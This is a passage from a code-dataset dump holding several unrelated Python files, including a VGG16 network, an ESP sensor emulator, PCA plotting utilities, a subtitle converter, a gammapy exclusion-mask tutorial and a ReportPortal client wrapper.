tf.get_variable(name=\"fc_1_b\", shape=(512,), initializer=tf.ones_initializer(), dtype=tf.float32)\n self.para_dict['fc_1'] = [fc_W, fc_b]\n\n fc_W = tf.get_variable(name=\"fc_2_W\", shape=(512, 10), initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), dtype=tf.float32)\n fc_b = tf.get_variable(name=\"fc_2_b\", shape=(10,), initializer=tf.ones_initializer(), dtype=tf.float32)\n self.para_dict['fc_2'] = [fc_W, fc_b]\n\n # create operations at every dot product percentages\n for dp_i in dp:\n with tf.name_scope(str(int(dp_i*100))):\n conv1_1 = self.idp_conv_layer( self.x, \"conv1_1\", dp_i)\n conv1_2 = self.idp_conv_layer(conv1_1, \"conv1_2\", dp_i)\n pool1 = self.max_pool(conv1_2, 'pool1')\n\n conv2_1 = self.idp_conv_layer( pool1, \"conv2_1\", dp_i)\n conv2_2 = self.idp_conv_layer(conv2_1, \"conv2_2\", dp_i)\n pool2 = self.max_pool(conv2_2, 'pool2')\n\n conv3_1 = self.idp_conv_layer( pool2, \"conv3_1\", dp_i)\n conv3_2 = self.idp_conv_layer(conv3_1, \"conv3_2\", dp_i)\n conv3_3 = self.idp_conv_layer(conv3_2, \"conv3_3\", dp_i)\n pool3 = self.max_pool(conv3_3, 'pool3')\n\n conv4_1 = self.idp_conv_layer( pool3, \"conv4_1\", dp_i)\n conv4_2 = self.idp_conv_layer(conv4_1, \"conv4_2\", dp_i)\n conv4_3 = self.idp_conv_layer(conv4_2, \"conv4_3\", dp_i)\n pool4 = self.max_pool(conv4_3, 'pool4')\n\n conv5_1 = self.idp_conv_layer( pool4, \"conv5_1\", dp_i)\n conv5_2 = self.idp_conv_layer(conv5_1, \"conv5_2\", dp_i)\n conv5_3 = self.idp_conv_layer(conv5_2, \"conv5_3\", dp_i)\n pool5 = self.max_pool(conv5_3, 'pool5')\n\n fc_1 = self.fc_layer(pool5, 'fc_1')\n fc_1 = tf.nn.dropout(fc_1, keep_prob=0.5)\n fc_1 = tf.nn.relu(fc_1)\n \n logits = self.fc_layer(fc_1, 'fc_2')\n prob = tf.nn.softmax(logits, name=\"prob\")\n \n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=self.y)\n loss = tf.reduce_mean(cross_entropy)\n accuracy = tf.reduce_mean(tf.cast(tf.equal(x=tf.argmax(logits, 1), y=tf.argmax(self.y, 1)),tf.float32))\n \n self.prob_dict[str(int(dp_i*100))] = prob\n self.loss_dict[str(int(dp_i*100))] = loss\n self.accu_dict[str(int(dp_i*100))] = accuracy\n \n tf.summary.scalar(name=\"accu_at_\"+str(int(dp_i*100)), tensor=accuracy)\n tf.summary.scalar(name=\"loss_at_\"+str(int(dp_i*100)), tensor=loss)\n \n self.summary_op = tf.summary.merge_all()\n print((\"build model finished: %ds\" % (time.time() - start_time)))\n\n def avg_pool(self, bottom, name):\n return tf.nn.avg_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n def max_pool(self, bottom, name):\n return tf.nn.max_pool(bottom, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name=name)\n\n def idp_conv_layer(self, bottom, name, dp):\n with tf.name_scope(name+str(int(dp*100))):\n with tf.variable_scope(\"VGG16\",reuse=True):\n conv_filter = tf.get_variable(name=name+\"_W\")\n conv_biases = tf.get_variable(name=name+\"_b\")\n conv_gamma = tf.get_variable(name=name+\"_gamma\")\n \n H,W,C,O = conv_filter.get_shape().as_list()\n \n # create a mask determined by the dot product percentage\n n1 = int(O * dp)\n n0 = O - n1\n mask = tf.constant(value=np.append(np.ones(n1, dtype='float32'), np.zeros(n0, dtype='float32')), dtype=tf.float32)\n profile = tf.multiply(conv_gamma, mask)\n\n # create a profile coefficient, gamma\n filter_profile = tf.stack([profile for i in range(H*W*C)])\n filter_profile = tf.reshape(filter_profile, shape=(H, W, C, O))\n\n # IDP conv2d output\n conv_filter = tf.multiply(conv_filter, filter_profile)\n conv_biases = tf.multiply(conv_biases, profile)\n \n conv = tf.nn.conv2d(bottom, conv_filter, [1, 1, 1, 1], padding='SAME')\n conv = tf.nn.bias_add(conv, conv_biases)\n relu = tf.nn.relu(conv)\n \n return relu\n\n def fc_layer(self, bottom, name):\n with tf.name_scope(name):\n shape = bottom.get_shape().as_list()\n dim = 1\n for d in shape[1:]:\n dim *= d\n x = tf.reshape(bottom, [-1, dim])\n \n with tf.variable_scope(\"VGG16\",reuse=True):\n weights = tf.get_variable(name=name+\"_W\")\n biases = tf.get_variable(name=name+\"_b\")\n\n # Fully connected layer. Note that the '+' operation automatically broadcasts the biases.\n fc = tf.nn.bias_add(tf.matmul(x, weights), biases)\n return fc\n\n def get_conv_filter(self, name):\n if not self.infer:\n conv_filter = tf.get_variable(initializer=self.data_dict[name][0], name=name+\"_W\")\n else:\n conv_filter = tf.get_variable(shape=self.data_dict[name][0].shape, initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), name=name+\"_W\", dtype=tf.float32)\n H,W,C,O = conv_filter.get_shape().as_list()\n gamma = tf.get_variable(initializer=self.get_profile(O, self.prof_type), name=name+\"_gamma\", dtype=tf.float32)\n return conv_filter, gamma\n\n def get_bias(self, name):\n if not self.infer:\n return tf.get_variable(initializer=self.data_dict[name][1], name=name+\"_b\")\n else:\n return tf.get_variable(shape=self.data_dict[name][1].shape, initializer=tf.truncated_normal_initializer(mean=0, stddev=0.1), name=name+\"_b\", dtype=tf.float32)\n\n def get_profile(self, C, prof_type):\n def half_exp(n, k=1, dtype='float32'):\n n_ones = int(n/2)\n n_other = n - n_ones\n return np.append(np.ones(n_ones, dtype=dtype), np.exp((1-k)*np.arange(n_other), dtype=dtype))\n if prof_type == \"linear\":\n profile = np.linspace(1.0,0.0, num=C, endpoint=False, dtype='float32')\n elif prof_type == \"all-one\":\n profile = np.ones(C, dtype='float32')\n elif prof_type == \"half-exp\":\n profile = half_exp(C, 2.0)\n elif prof_type == \"harmonic\":\n profile = np.array(1.0/(np.arange(C)+1), dtype='float32')\n else:\n raise ValueError(\"prof_type must be \\\"all-one\\\", \\\"half-exp\\\", \\\"harmonic\\\" or \\\"linear\\\".\")\n return profile\n \n","sub_path":"vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":11863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"348538735","text":"# main.py\nimport random\nimport ujson\nimport urequests\nimport network\nimport ubinascii\nimport time\nfrom machine import Pin\n\nled = Pin(2, Pin.OUT)\n\n\nclass Module:\n def __init__(self):\n self.wlan = network.WLAN(network.STA_IF)\n self.wlan.active(True)\n\n def getMAC(self):\n mac = ubinascii.hexlify(self.wlan.config('mac'), ':').decode()\n return mac\n\n\nclass Emulator:\n def __init__(self):\n self.api_uri = \"http://192.168.0.2:3001/api\"\n self.now = urequests.get(self.api_uri + '/sync').json()\n\n def sendData(self, data: dict):\n response = urequests.post(\n self.api_uri + '/data',\n headers={'content-type': 'application/json'},\n data=ujson.dumps(data)\n )\n\n return response\n\n def generateData(self):\n self.now = urequests.get(self.api_uri + '/sync').json()\n mod = Module()\n data = {\n \"air_temperature\": random.randrange(20, 40),\n \"air_humidity\": random.randrange(5, 100),\n \"soil_humidity\": random.randint(1000, 4000),\n \"readed_by\": mod.getMAC(),\n \"readed_at\": self.now[\"time\"]\n }\n\n led.on()\n\n resp = self.sendData(data)\n print(resp.json())\n\n led.off()\n\n\nif __name__ == '__main__':\n while True:\n emu = Emulator()\n emu.generateData()\n time.sleep(5)\n","sub_path":"esp/sens-emu/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258317674","text":"# Name: Daniel Yan\n# Date: 2018-07-26\n# Email: daniel.yan@vanderbilt.edu\n#\n# Module for an incremental principal component analysis and saving important\n# results/plots.\n\n# Libaries\nfrom sklearn.decomposition import PCA, IncrementalPCA\nimport numpy as np\nimport matplotlib\n\nmatplotlib.use(\"Agg\") # Avoid display error\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Class Defaults\nN_COMPONENTS = 2 # Number of principal components to keep\nBATCH_SIZE = None # Size of incremental pca batch to control for memory\n# usage. Can be int or None.\n\n\ndef create_ipca(features_df, n_components=N_COMPONENTS, batch_size=BATCH_SIZE):\n \"\"\"Create an incremental pca based on a features matrix and return the\n transformed coordinates\n\n Keyword Arguments:\n features: Array-like object containing the features to do a PCA on.\n\n n_components: Number of dimensions to reduce down to (default\n N_COMPONENTS).\n\n batch_size: Size to use for incremental PCA. Can be integer or None (\n default BATCH_SIZE)\n\n Return:\n Numpy array with coordinates of principal components in columns.\n Column 0 contains component accounting for most variation, column 1\n contains component accounting for second-most, and so on.\n \"\"\"\n # Create the incremental PCA\n ipca = IncrementalPCA(n_components=N_COMPONENTS, batch_size=BATCH_SIZE)\n return ipca.fit_transform(features_df)\n\n\ndef label_coordinates(transformed_coordinates, labels, labels_col_name=\"label\"):\n \"\"\"Labels the transformed coordinates with the correct group.\n\n Keyword Arguments:\n transformed_coordinates: Numpy array (or similar) containing the\n coordinates in the principal components\n\n labels: Array-like object containing labels for the coordinates. The\n labels should be in\n the same order as the rows in transformed_coordinates\n\n labels_col_name: String for the name of the column containing the\n labels within the dataframe\n (default = \"label\")\n\n axis: List of integers specifying xmin, xmax, ymin, ymax for axes.\n\n Return: Pandas dataframe with labels inserted as the last column of\n transformed_coordinates\n \"\"\"\n # Convert transformed coordinates to pandas dataframe\n transformed_df = pd.DataFrame(transformed_coordinates)\n\n # Label the transformed data\n transformed_df[labels_col_name] = labels\n\n return transformed_df\n\n\ndef scatterplot_cords(df, file_name, labels_list, colors_list,\n labels_col_name=\"label\", figsize=(20, 20), fontsize=30,\n title=\"\", alpha=0.2, component_x=1, component_y=2,\n x_label=\"\", y_label=\"\", axis=\"auto\"):\n \"\"\"Create a scatter plot for the coordinates with different groups\n labeled by color and saves to file\n\n Keyword Arguments:\n df: Pandas data frame containing transformed coordinates and labels\n as last column\n\n file_name: String name of the directory and file to save to\n\n labels_list: List of labels used to label the data\n\n colors_list: List of colors used for the different labels.\n\n labels_col_name: String for the name of the column containing the\n labels within the dataframe\n (default = \"label\"). Must be same as labels_col_name parameter in\n label_coordinates function.\n\n figsize: Tuple containing height and width of the figure in inches (\n default (20, 20))\n\n fontsize: Integer size of the font for title and legend (default = 30)\n\n title: String title for the plot (default is empty string)\n\n alpha: Alpha level for points on scatter plot (default = 0.2)\n\n component_x: Column number of coordinates to plot on x axis + 1\n (default is 1, corresponding to column 0)\n\n component_y: Column number of coordinates to plot on y-axis + 1\n (default is 1, corresponding to column 0)\n\n x_label: String to label x-axis (default is empty string)\n\n y_label: String to label y-axis (default is empty string)\n\n Return: Axis used for plot\n \"\"\"\n # Plot the pca\n plt.figure(figsize=figsize)\n\n # Create tuples matching labels to colors, and plot points corresponding\n # to each label\n # one label at a time on the scatter plot\n for label, color in zip(labels_list, colors_list):\n # Select rows that correspond to the current label\n rows = df.loc[df.loc[:, labels_col_name] == label]\n # Plot on the points corresponding to the current label on the plot\n # with\n # unique color\n plt.scatter(rows.iloc[:, (component_x - 1)],\n rows.iloc[:, (component_y - 1)], color=color, label=label,\n alpha=alpha)\n\n plt.title(title, fontsize=fontsize)\n plt.legend(fontsize=fontsize)\n plt.xlabel(x_label, fontsize=fontsize)\n plt.ylabel(y_label, fontsize=fontsize)\n plt.axis(axis)\n plt.savefig(file_name)\n # Store the axis to return\n axes = plt.axis()\n plt.close()\n return axes\n\n\ndef save_variances(pca, file_name):\n \"\"\"\n Save variances for components of PCA to file.\n :param pca: Scikit learn PCA object that contains variances to save.\n :param file_name: Name of file, including directory and extension,\n to save variances to.\n :return: None\n \"\"\"\n with open(file_name, mode=\"w+\") as file:\n count = 1\n sum = 0\n # Save the explained variance for each individual component\n for i in pca.explained_variance_ratio_:\n file.write(\n \"Explained Variance Ratio for Component {}: {}%\\n\".format(count,\n i *\n 100))\n count += 1\n sum += i * 100\n # Save the combined explained variance from all components\n file.write(\"Total explained ratio from {} components: {}%\\n\".format(\n count, sum))\n","sub_path":"bin/2018_07_26_random_sets_pca/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":6035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309353509","text":"def permutation(A):\n if len(A) < 2: return [A]\n soln = []\n for i in range(len(A)):\n elem = A[i]\n remain = A[:i] + A[i+1:]\n remain_perm = permutation(remain)\n for perm in remain_perm:\n soln.append([elem] + perm)\n return soln\n","sub_path":"recursion/permutation/py/perm.py","file_name":"perm.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"442170915","text":"def load_mecab(text_name):\n with open(text_name) as f:\n text = f.read()\n\n mecab = []\n text = text.split(\"\\n\")\n for line in text:\n line = line.split(\"\\t\")\n if len(line) < 2:\n break\n line2 = line[1].replace(\"*,\", \"\").split(\",\")\n mapping = {\n \"surface\": line[0],\n \"base\": line2[-3],\n \"pos\": line2[0],\n \"pos1\": line2[1],\n }\n mecab.append(mapping)\n return mecab\n\n\ndef extract_pos(text, morpheme, pos=None, pos1=None):\n if pos is None:\n pos_name = \"pos1\"\n extract_pos_name = pos1\n else:\n pos_name = \"pos\"\n extract_pos_name = pos\n\n verb = [\n mapping[morpheme] for mapping in text if mapping[pos_name] == extract_pos_name\n ]\n\n return verb\n","sub_path":"4/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136976822","text":"import json\nimport os\n\n\nconfig = {\n \"dir\":{\n \"datadir\": \"/home/cactuskid13/mntpt/unil_backup/profilingbackup/\",\n \"omadir\": \"/home/cactuskid13/mntpt/OMA/jun/\"\n },\n \"orthoxmltar\":\"\",\n \"email\": \"dmoi@unil.ch\"\n}\n\ndatadir = config['dir']['datadir']\nomadir = config['dir']['omadir']\nemail = config['email']\ntarfile = config['orthoxmltar']\nif len(tarfile)==0:\n tarfile = None\n\nfor dir in config['dir'].values():\n if not os.path.isdir(dir):\n os.mkdir(path=dir)\nprint(config)\n","sub_path":"pyprofiler/build/lib/utils/config_utils.py","file_name":"config_utils.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"162526141","text":"#Почти счастливое число\ni = int(input())\ncount = 0\nwhile i>0:\n rem = i%10\n i = i//10\n if (rem == 4 or rem == 7):\n count = count + 1\nif (count == 4 or count == 7):\n print(\"YES\")\nelse:\n print(\"NO\")\n","sub_path":"ICPC_Beg_Contest1_F.py","file_name":"ICPC_Beg_Contest1_F.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11610778","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/10/29 10:19\n# @Author : yangxue\n# @Email : yangxue@xiyun.com.cn\n# @File : calccostprice.py\n\nfrom decimal import Decimal\n\n'''\n业务模式有3种,采购入库,采购退货出库,销售退货入库\n1,采购入库:库存数量(Store),成本价(Costprice),采购入库数量(Buynum),不含税采购价(Realprice)\n2,采购退货出库:库存数量(Store),成本价(Costprice),采购退货出库数量(ReturnOutnum),采购入库时不含税采购价(RealBuyprice)\n3,销售退货入库:库存数量(Store),成本价(Costprice),销售退货入库数量(ReturnInnum),销售时成本价(BuyCostprice)\n公式:\n1,fCostprice=(Store*Costprice+Buynum*Realprice)/(Store+Buynum)\n2,fCostprice=(Store*Costprice-ReturnOutnum*RealBuyprice)/(Store-ReturnOutnum)\n3,fCostprice=(Store*Costprice+ReturnInnum*BuyCostprice)/(Store+ReturnInnum)\n'''\n\n\nclass Calculate():\n def __init__(self):\n self.store=float(input('请输入商品库存: '))\n self.costprice=float(input('请输入商品成本价: '))\n\n def formatdata(self,data):\n fdata=float('%.2f'%data)\n return fdata\n\n\n def buysome(self):\n Buynum=float(input('请输入购买数量:'))\n price=float(input('请输入含税采购金额:'))\n tax=float(float(input('请输入税率(): '))/100.00)\n Realprice=float('%.2f'%(price/(1+tax)))\n taxmoney=float('%.2f'%(price-Realprice))\n fcostprice = float('%.2f'%((self.store * self.costprice + Buynum * Realprice) / (self.store + Buynum)))\n self.store+=Buynum\n self.costprice=fcostprice\n print('不含税采购价:%f,税额为 %f'%(Realprice,taxmoney))\n print('目前库存数量为:%d ,成本价为:%s'%(self.store,self.costprice))\n\n def returnoutsome(self):\n ReturnOutnum=float(input('请输入退货数量:'))\n RealBuyTaxprice=float(input('请输入采购时含税金额: '))\n tax=float(float(input('请输入税率: '))/100.00)\n RealBuyprice=float('%.2f'%(RealBuyTaxprice/(1+tax)))\n taxmoney=float(RealBuyTaxprice-RealBuyprice)\n fCostprice =float('%.2f'%((self.store*self.costprice-ReturnOutnum*RealBuyprice)/(self.store - ReturnOutnum)))\n self.store=self.store-ReturnOutnum\n self.costprice=fCostprice\n print('不含税采购价:%.2f,税额为 %.2f'%(Realprice,taxmoney))\n print('目前库存数量为:%d ,成本价为:%s' % (self.store, self.costprice))\n\n def returninsome(self):\n ReturnInnum=float(input('请输入销售退货数量: '))\n BuyCostprice=float(input('请输入销售时成本价: '))\n fcostprice=float('%.2f'%((self.store*self.costprice+ReturnInnum*BuyCostprice)/(self.store+ReturnInnum)))\n self.store+=ReturnInnum\n self.costprice=fcostprice\n print('目前库存数量为:%d ,成本价为:%s' % (self.store, self.costprice))\n\n def signalCostprice(self):\n tax=float(float(input('请输入税率: '))/100.00)\n RealBuyTaxprice = float(input('请输入销售时含税金额: '))\n x=float(float(input('请输入系数: '))/100.00)\n RealBuyprice = float('%.2f' % (RealBuyTaxprice / (1 + tax)))\n taxmoney = float('%.2f'%(RealBuyTaxprice - RealBuyprice))\n singalcostprice=float('%.2f'%((self.costprice+taxmoney)*(1.00+x)))\n print('不含税单价:%f ,税额:%f'%(RealBuyprice,taxmoney))\n print('成本单价为:',singalcostprice)\n\n def outcostprice(self):\n pass\n\n\n\n\n def Do(self):\n\n while 1:\n y=int(input('请输入业务编号:(采购入库-1,采购退货出库-2,销售退货入库-3,成本单价-4,推出-5):'))\n if y==1:\n c.buysome()\n elif y ==3:\n c.returninsome()\n elif y ==2:\n c.returnoutsome()\n elif y==4:\n c.signalCostprice()\n elif y==5:\n print('退出')\n break\n else:\n print('输入有误请重新输入!')\n continue\n\n\nif __name__ =='__main__':\n c=Calculate()\n c.Do()\n","sub_path":"demo/calccostprice.py","file_name":"calccostprice.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"185428005","text":"from __future__ import division, unicode_literals\nimport sys\nimport re\nimport os\nimport chardet # For non-Unicode encoding detection\n\ndef parser(file, path):\n ext = path.rfind(\".\")\n converted_path = path[:ext]+\".vtt\"\n sbt_obj = file.read()\n first_line = sbt_obj\n file.close()\n if first_line[:7] == '\\n':\n smi_obj = sbt_obj\n # Remove language class tag\n smi_obj = re.sub('(

    )+', '', smi_obj)\n # Remove all non-numbers in SYNC tag\n smi_obj = re.sub('','',smi_obj)\n # Find empty lines (' ') and move the ms marker\n # If the actual subtitle is on the same line as the timestamp, then add a break (\\n)\n sbtl = re.search('',smi_obj)\n if len(sbtl) >= 1:\n smi_obj = re.sub('','',smi_obj)\n # Replace '
    ' with '\\n'\n smi_obj = re.sub('(
    )+', '\\n', smi_obj)\n # Convert ms into timestamp\n\n elif first_line[:2] == '1\\n' or first_line[1:3] == '1\\n':\n srt_obj = sbt_obj\n # Convert the timestamp format\n org_ts = re.findall('(\\d{0,2}?:\\d{0,2}?:\\d{0,2}?,)+', srt_obj)\n mod_ts = [a.replace(',','.') for a in org_ts]\n i = 0\n for org in org_ts:\n org = org_ts[i]\n mod = mod_ts[i]\n srt_obj = srt_obj.replace(org, mod)\n i += 1\n # Add string \"WEBVTT\" at the top\n header = \"WEBVTT\\n\\n\"\n srt_obj = header + srt_obj\n if sys.version_info <= (2,8):\n srt_obj = unicode(srt_obj).encode(\"utf-8\")\n with open(converted_path, \"w\") as converted:\n converted.write(srt_obj)\n if converted:\n converted.close()\n print(\"Successfully converted the subtitle!\")\n\n else:\n print(\"Not a valid SAMI or SubRip file!\")","sub_path":"submarine/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"90342053","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Creating exclusion masks\n# \n# ## Introduction\n# \n# ### Prerequisites\n# \n# - Understanding of basic analyses in 1D or 3D.\n# - Usage of `~regions` and catalogs, see the [catalog notebook](catalog.ipynb). \n# \n# ### Context\n# \n# Background templates stored in the DL3 IRF are often not reliable enough to be used without some corrections. A set of common techniques to perform background or normalisation from the data is implemented in gammapy: reflected regions for 1D spectrum analysis, field-of-view (FoV) background or ring background for 2D and 3D analyses.\n# \n# To avoid contamination of the background estimate from gamma-ray bright regions these methods require to exclude those regions from the data used for the estimation. To do so, we use exclusion masks. They are maps containing boolean values where excluded pixels are stored as False. \n# \n# **Objective: Build an exclusion mask around the Crab nebula excluding gamma-ray sources in the region.**\n# \n# ### Proposed approach\n# \n# Here we have to build a `Map` object, we must first define its geometry and then we can determine which pixels to exclude.\n# \n# We can rely on known sources positions and properties to build a list of regions (here `~regions.SkyRegions`) enclosing most of the signal that our detector would see from these objects. We show below how to build this list manually or from an existing catalog. \n# \n# Finally, we show how to build the mask from a `MapDataset`, finding pixels which contain statistically significant signal. To do so, we use the `ExcessMapEstimator`\n# \n\n# ## Setup\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\n\n# In[ ]:\n\n\nimport numpy as np\nfrom astropy.coordinates import SkyCoord, Angle\nfrom regions import read_ds9, CircleSkyRegion\nfrom gammapy.maps import Map, WcsGeom\nfrom gammapy.utils.regions import make_region\nfrom gammapy.catalog import SOURCE_CATALOGS\nfrom gammapy.datasets import Datasets\nfrom gammapy.estimators import ExcessMapEstimator\n\n\n# ## Create the mask from a list of regions\n# \n# One can build an exclusion mask from regions. We show here how to proceed.\n\n# ### Define the geometry\n# \n# Exclusions masks are stored in `Map` objects. One has therefore to define the geometry to use. Here we consider a region at the Galactic anticentre around the crab nebula.\n\n# In[ ]:\n\n\nposition = SkyCoord(83.633083, 22.0145, unit=\"deg\", frame=\"icrs\")\ngeom = WcsGeom.create(\n skydir=position, width=\"5 deg\", binsz=0.02, frame=\"galactic\"\n)\n\n\n# ### Create the list of regions\n# \n# A useful function to create region objects is `~gammapy.utils.regions.make_region`. It can take strings defining regions following the \"ds9\" format and convert them to `regions`. \n# \n# Here we use a region enclosing the Crab nebula with 0.3 degrees. The actual region size should depend on the expected PSF of the data used. We also add another region with a different shape as en example.\n\n# In[ ]:\n\n\nsome_region = make_region(\"galactic;box(185,-4,1.0,0.5, 45)\")\ncrab_region = make_region(\"icrs;circle(83.633083, 22.0145, 0.3)\")\nregions = [some_region, crab_region]\nprint(regions)\n\n\n# Equivalently the regions can be read from a ds9 file, this time using `regions.read_ds9`. \n\n# In[ ]:\n\n\n# regions = read_ds9('ds9.reg')\n\n\n# ### Create the mask map \n# \n# We can now create the map. We use the `WcsGeom.region_mask` method putting all pixels inside the regions to False.\n\n# In[ ]:\n\n\nmask_data = geom.region_mask(regions, inside=False)\nmask_map = Map.from_geom(geom, data=mask_data)\n\n\n# In[ ]:\n\n\nmask_map.plot()\n\n\n# ## Create the mask from a catalog of sources\n# \n# We can also build our list of regions from a list of catalog sources. Here we use the Fermi 4FGL catalog which we read using `~gammapy.catalog.SourceCatalog`.\n\n# In[ ]:\n\n\nfgl = SOURCE_CATALOGS.get_cls(\"4fgl\")()\n\n\n# We now select sources that are contained in the region we are interested in.\n\n# In[ ]:\n\n\ninside_geom = geom.contains(fgl.positions)\nidx = np.where(inside_geom)[0]\n\n\n# We now create the list of regions using our 0.3 degree radius a priori value. If the sources were extended, one would have to adapt the sizes to account for the larger size.\n\n# In[ ]:\n\n\nexclusion_radius = Angle(\"0.3 deg\")\nregions = [CircleSkyRegion(fgl[i].position, exclusion_radius) for i in idx]\n\n\n# Now we can build the mask map the same way as above.\n\n# In[ ]:\n\n\nmask_data = geom.region_mask(regions, inside=False)\nmask_map_catalog = Map.from_geom(geom, data=mask_data)\n\n\n# In[ ]:\n\n\nmask_map_catalog.plot()\n\n\n# ### Combining masks\n# \n# If two masks share the same geometry it is easy to combine them with `Map` arithmetics.\n\n# In[ ]:\n\n\nmask_map *= mask_map_catalog\nmask_map.plot()\n\n\n# ## Create the mask from statistically significant pixels in a dataset\n# \n# Here we want to determine an exclusion from the data directly. We will estimate the significance of the data and exclude all pixels above a given threshold.\n# \n# Here we use a dataset taken from Fermi data used in the 3FHL catalog. The dataset is already in the form of a `Datasets` object. We read it from disk. \n\n# In[ ]:\n\n\ndatasets = Datasets.read(\n \"$GAMMAPY_DATA/fermi-3fhl-crab/Fermi-LAT-3FHL_datasets.yaml\",\n \"$GAMMAPY_DATA/fermi-3fhl-crab/Fermi-LAT-3FHL_models.yaml\",\n)\n\n\n# We want to compute the significance per pixels for the data integrated over energy. We reduce the dataset to a simple image. \n\n# In[ ]:\n\n\ndataset = datasets[0].to_image()\n\n\n# We now apply a significance estimation. We integrate the counts using a correlation radius of 0.4 degree and apply regular significance estimate. \n\n# In[ ]:\n\n\nestimator = ExcessMapEstimator(\"0.4 deg\")\nresult = estimator.run(dataset, steps=\"ts\")\n\n\n# Finally, we copy the significance map for our mask and apply a threshold of 5 sigma to remove pixels.\n\n# In[ ]:\n\n\nmask_map_significance = result[\"significance\"].copy()\nmask_map_significance.data = mask_map_significance.data < 5.0\n\n\n# In[ ]:\n\n\nmask_map_significance.sum_over_axes().plot()\n\n\n# This method frequently yields isolated pixels or weakly significant features if one places the threshold too low. \n# \n# To overcome this issue, one can use `~skimage.filters.apply_hysteresis_threshold` . This filter allows to define two thresholds and mask only the pixels between the low and high thresholds if they are not continuously connected to a pixel above the high threshold. This allows to better preserve the structure of the excesses. \n# \n# Note that scikit-image is not a required dependency of gammapy, you might need to install it.\n# \n\n# In[ ]:\n\n\n\n\n","sub_path":"docs/0.17/_static/notebooks/exclusion_mask.py","file_name":"exclusion_mask.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497031092","text":"#!/usr/bin/python3\n# coding=utf-8\n# pylint: skip-file\n\n# Copyright 2019 getcarrier.io\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n Code from Dusty 1.0\n\"\"\"\n\nimport traceback\n\nfrom time import time\nfrom reportportal_client import ReportPortalService\n\nfrom . import constants # from dusty import constants\n\nrp_service = None\n\n\ndef timestamp():\n return str(int(time() * 1000))\n\n\ndef my_error_handler(exc_info):\n \"\"\"\n This callback function will be called by async service client when error occurs.\n Return True if error is not critical and you want to continue work.\n :param exc_info: result of sys.exc_info() -> (type, value, traceback)\n :return:\n \"\"\"\n traceback.print_exception(*exc_info)\n\n\ndef launch_reportportal_service(rp_config):\n if not rp_config:\n return None\n global rp_service\n\n if not rp_service:\n rp_service = ReportPortalDataWriter(endpoint=rp_config[\"rp_url\"],\n token=rp_config[\"rp_token\"],\n project=rp_config[\"rp_project\"],\n launch_name=rp_config[\"rp_launch_name\"],\n tags=rp_config[\"rp_launch_tags\"])\n rp_service.start_test()\n return rp_service\n\n\nclass ReportPortalDataWriter:\n def __init__(self, endpoint, token, project, log_batch_size=100, launch_name=None, tags=None,\n launch_doc=None, launch_id=None, verify_ssl=False):\n self.endpoint = endpoint\n self.token = token\n self.project = project\n self.log_batch_size = log_batch_size\n self.launch_name = launch_name\n self.tags = tags\n self.launch_doc = launch_doc\n self.service = None\n self.test = None\n self.verify_ssl = verify_ssl\n self.launch_id = launch_id\n\n def start_service(self):\n self.service = ReportPortalService(endpoint=self.endpoint,\n project=self.project,\n token=self.token,\n log_batch_size=self.log_batch_size,\n verify_ssl=self.verify_ssl)\n if self.launch_id:\n self.service.launch_id = self.launch_id\n\n def start_test(self):\n if not self.service:\n self.start_service()\n return self.service.start_launch(name=self.launch_name,\n start_time=timestamp(),\n description=self.launch_doc,\n tags=self.tags)\n\n def finish_test(self):\n self.service.finish_launch(end_time=timestamp())\n self.service.terminate()\n self.service = None\n\n def is_test_started(self):\n if self.service:\n return True\n return False\n\n def start_test_item(self, issue, description, item_type='STEP'):\n return self.service.start_test_item(issue, description=description,\n start_time=timestamp(),\n item_type=item_type)\n\n def test_item_message(self, message, level=\"ERROR\", attachment=None):\n if len(message) > constants.MAX_MESSAGE_LEN:\n index = 0\n while index < len(message):\n increment = constants.MAX_MESSAGE_LEN\n if index + increment > len(message):\n increment = len(message) - index\n self.service.log(time=timestamp(), message=message[index:index+increment],\n level=level, attachment=attachment)\n index = index+increment\n else:\n self.service.log(time=timestamp(), message=message,\n level=level, attachment=attachment)\n\n def finish_test_item(self, item_id, status=\"FAILED\"):\n 